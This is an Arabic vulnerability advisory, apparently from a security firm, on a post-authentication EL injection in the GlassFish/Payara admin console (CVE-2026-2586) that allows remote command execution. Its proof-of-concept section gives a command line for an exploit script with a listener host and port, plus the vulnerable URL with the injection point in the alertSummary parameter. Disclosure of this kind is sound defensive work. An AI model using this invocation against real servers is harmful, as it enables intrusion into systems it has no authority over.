تنفيذ أكواد عن بُعد عبر حقن تعبيرات EL في GlassFish عند المصادقة (CVE-2026-2586)
تتيح ثغرة حقن لغة التعبيرات (Expression Language Injection) في وحدة تحكم إدارة GlassFish لمستخدم مصدَّق حقن تعبيرات EL خبيثة في المعاملات التي تعالجها واجهة الويب الإدارية. وقد يؤدي الاستغلال الناجح إلى تنفيذ أوامر عن بُعد على الخادم المتأثر.
تم تحديد الثغرة في مسار تحرير التكوين الافتراضي للخادم، حيث يتم تفسير المعاملات التي يتحكم فيها المستخدم بشكل غير آمن من قِبل التطبيق.
يحدث ذلك للأسباب التالية:
- تعالج الواجهة الإدارية معاملات يتحكم فيها المستخدم ضمن تعبيرات EL.
- لا يتم التحقق من الإدخال أو تحييده بشكل صحيح قبل تفسيره من قِبل الواجهة الخلفية.
- يمكن لمستخدم مصدَّق في وحدة التحكم الإدارية إساءة استخدام السلوك القابل للاستغلال لاستدعاء فئات وطرق Java.
- في سيناريو استغلال ناجح، يمكن لمهاجم يمتلك بيانات اعتماد صالحة تنفيذ أوامر على نظام التشغيل الأساسي.
المكوّن المتأثر
- المنتج: وحدة تحكم إدارة GlassFish / Payara
- CVE: CVE-2026-2586
- النوع: حقن لغة التعبيرات (EL Injection)
- الأثر: تنفيذ أكواد عن بُعد بعد المصادقة
- ناقل الهجوم: واجهة الويب الإدارية
إثبات المفهوم
تم إجراء الاختبار في بيئة محلية وخاضعة للتحكم.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
الرابط القابل للاستغلال:
https://glassfish:4848/web/configuration/virtualServerEdit.jsf?name=server&configName=server-config&alertType=success&alertSummary=PAYLOAD&alertDetail=&bare=true
إخلاء المسؤولية القانونية
للاستخدام المصرَّح به فقط. لا تؤيد شركة DeepSecurity Perú الوصول غير المصرَّح به، ولا تتحمل أي مسؤولية عن أي إساءة استخدام للمعلومات المقدَّمة.